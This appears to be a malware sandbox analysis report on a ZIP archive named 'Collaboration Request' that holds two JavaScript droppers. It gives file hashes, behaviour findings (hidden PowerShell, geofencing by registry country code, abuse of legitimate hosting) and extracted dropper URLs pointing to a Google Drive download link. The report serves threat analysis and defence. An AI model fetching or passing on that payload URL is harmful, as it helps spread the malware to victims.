Overview

overview

10

Static

static

1

Collaborat...nfo.js

windows7-x64

10

Collaborat...nfo.js

windows10-2004-x64

10

Collaborat...RFQ.js

windows7-x64

10

Collaborat...RFQ.js

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    01112024_0726_31102024_Collaboration Request.zip

  • Size

    8KB

  • Sample

    241101-h92gtaycle

  • MD5

    159a95d54a241ba94dc10be0d3f0bcf6

  • SHA1

    2ac9716c89e2e32262f5929e6a908a46934c61d5

  • SHA256

    397c1cb5536c84ebaf2ab511cf4183be4364ed6619c0bfaf2ac816a99ec49a4a

  • SHA512

    da65ee801bdf975a34ba707e07c6654a1863bc8fedafcca6edce4597aa1c0476dcf6a18d9efd5e5b434f616ee9b69d96e5bc7261482d728b8073539446e28b5a

  • SSDEEP

    192:aNOW255H8Gr60k3ZZxmNCvdqhe+GlJje5i:Wf25iC60k3vi5Qxj6i

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Targets

    • Target

      Collaboration Request/Company Info.js

    • Size

      15KB

    • MD5

      03cf8621c289fbd13ebf3f14837da3d1

    • SHA1

      61239e9eeb422eb59306f354546fcd8317a2ce69

    • SHA256

      4d8fd3bbbcf0f1ab58cbef0b189ed1e3abbf6ff523c0b478f80fffc2aa36ba53

    • SHA512

      c1a3483d30f211bd5d17feaa7081c8e75353cf3b556b4bbb86c611b553db8a580c24bcb52c8c0a8c15df20100da4b91aa6e99563466789eee7dedbe1a1513d8a

    • SSDEEP

      384:zkICeaCPI9hUmMLVmdZyukUQqhHdHviwDv:QICjC6hDYmdZKUQqh9PiwDv

    Score
    10/10
    execution

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1behavioral2

    • Target

      Collaboration Request/RFQ.js

    • Size

      15KB

    • MD5

      e1b56b06f44512e79ce26a1db4958fa0

    • SHA1

      5c0a3a02fd37d85330012ac27ee59cd05466f866

    • SHA256

      943e6c8dd31effd085cd83c1f681d8c2f5d7d1967b34dacfed7ac3db51d60c1b

    • SHA512

      b5a3e3c82a812375da64ad2e7ba3820d9058adc2f5f3d45035984b27dec64451cbd45b547385e7de221e82b01967aff2495d33a826eb0738871c739a27b95770

    • SSDEEP

      384:zktd8aCPI9hUmMLVmdZyukUnRHxHCiDze:QtdhC6hDYmdZKUnRRiiDze

    Score
    10/10
    execution

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Legitimate hosting services abused for malware hosting/C2

    behavioral3behavioral4

MITRE ATT&CK Enterprise v15

Tasks